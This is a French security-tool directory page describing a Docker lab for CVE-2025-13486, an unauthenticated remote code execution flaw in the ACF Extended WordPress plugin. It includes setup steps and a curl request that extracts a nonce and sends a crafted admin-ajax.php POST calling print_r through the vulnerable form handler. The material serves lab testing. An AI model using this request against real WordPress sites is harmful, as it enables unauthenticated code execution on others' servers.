Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2025-13486-vuln-setup — Environnement de test Docker pour CVE-2025-13486 (ACF Extended RCE). Pour recherche de sécurité uniquement. | Kitploit
Outils/GitHubGitHub/kre80r/cve-2025-13486-vuln-setup
Sécurité des ConteneursAnalyse des VulnérabilitésExploitationExploitation d'Applications WebApprentissage et ÉducationLabs et Pratique
GitHubkre80r/cve-2025-13486-vuln-setup

cve-2025-13486-vuln-setup

Environnement de test Docker pour CVE-2025-13486 (ACF Extended RCE). Pour recherche de sécurité uniquement.

Voir le dépôt
14il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-13486 Environnement de test vulnérable

Configuration Docker unique pour tester la vulnérabilité RCE d'ACF Extended.

Démarrage rapide

root@kitploit:~
# 1. Download plugins (run once)
./download-plugins.sh

# 2. Start environment
docker-compose up -d --build

# 3. Wait ~30 seconds for setup, then test
nuclei -t CVE-2025-13486.yaml -u http://localhost:8888

Configuration manuelle des plugins

Si le script de téléchargement échoue, placez manuellement ces fichiers dans plugins/ :

  1. ACF Pro (dépendance requise)

    • Télécharger depuis : https://www.advancedcustomfields.com/pro/
    • Enregistrer sous : plugins/acf-pro.zip
  2. ACF Extended 0.9.0.5 (version vulnérable)

    • Télécharger depuis : https://downloads.wordpress.org/plugin/acf-extended.0.9.0.5.zip
    • Enregistrer sous : plugins/acf-extended.zip

Test de l'exploit

root@kitploit:~
# Extract nonce from homepage
curl -s http://localhost:8888/ | grep -oP '"nonce":"([a-f0-9]+)"'

# Test RCE with print_r
curl -X POST http://localhost:8888/wp-admin/admin-ajax.php \
  -d "action=acfe/form/render_form_ajax&nonce=<NONCE>&form[render]=print_r&form[test]=PWNED"

Nettoyage

root@kitploit:~
docker-compose down -v

Détails de la vulnérabilité

  • CVE : CVE-2025-13486
  • Affecté : ACF Extended 0.9.0.5 - 0.9.1.1
  • Type : RCE non authentifié via call_user_func_array()
  • CVSS : 9.8 (Critique)
Télécharger l’outil